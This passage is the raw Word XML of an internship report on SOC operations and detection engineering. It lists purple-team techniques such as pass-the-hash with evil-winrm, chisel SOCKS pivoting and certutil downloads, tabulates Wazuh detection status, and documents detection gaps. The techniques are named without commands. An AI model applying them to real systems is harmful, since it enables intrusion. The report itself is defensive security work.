        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pass-the-hash: evil-winrm with NT hash authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network pivoting: chisel reverse SOCKS proxy, proxychains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Living-off-the-Land binaries: certutil for file download</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4 Threat Hunting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KQL query construction for OpenSearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hypothesis-driven investigation methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection gap identification and documentation</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Final Operational State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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">VirusTotal Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational - validated with EICAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Audit Policies (DC1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Fully enabled (Logon + Kerberos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Audit Policies (HQ-STAFF-01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Fully enabled (Logon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Channel Forwarding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational (both agents)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom pfSense Decoder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational - validated via wazuh-logtest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom Rules 100300 / 100301</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational - port scan detection working</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Response (netsh)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational - validated on both DC1 and HQ-STAFF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication Monitoring Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Deployed with 3 custom visualizations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Use Case 1 (Brute Force)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Detected + Auto-contained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Use Case 2 (Lateral Movement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Partially detected (see gaps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Use Case 3 (Domain Compromise)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Partially detected (see gaps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection Gaps Documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">8 gaps identified with remediation plans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident Reports Produced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">3 formal reports (IR-2026-001, 002, 003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. Closing Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Month 2 transformed the Month 1 infrastructure into a functional SOC environment with real detection engineering, purple team exercises, and formal incident response documentation. The work spans both what worked (VirusTotal enrichment, brute force detection with automated containment, pfSense port scan correlation, custom decoders) and what did not (Kerberoasting, DCSync, LOLBin usage, tunneling - all executed successfully by the red team without triggering meaningful alerts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The gap documentation is deliberate: a mature SOC report identifies what its telemetry does NOT catch as much as what it does. Every gap in Section 8 is paired with a concrete remediation recommendation, forming the basis for the detection engineering roadmap in Month 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All exercises, configurations, and outcomes documented in this report are reproducible from the Lab Modifications inventory in Section 4.</w:t>
      </w:r>
    </w:p>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240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E5496"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E5496"/>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Month 2 - SOC Operations &amp; Detection Engineering</dc:title>
  <dc:creator>Abdimalik Yusuf Mohamud</dc:creator>
  <dc:description>Internship Technical Report - Month 2</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-11T14:19:07.650Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-11T14:19:07.663Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>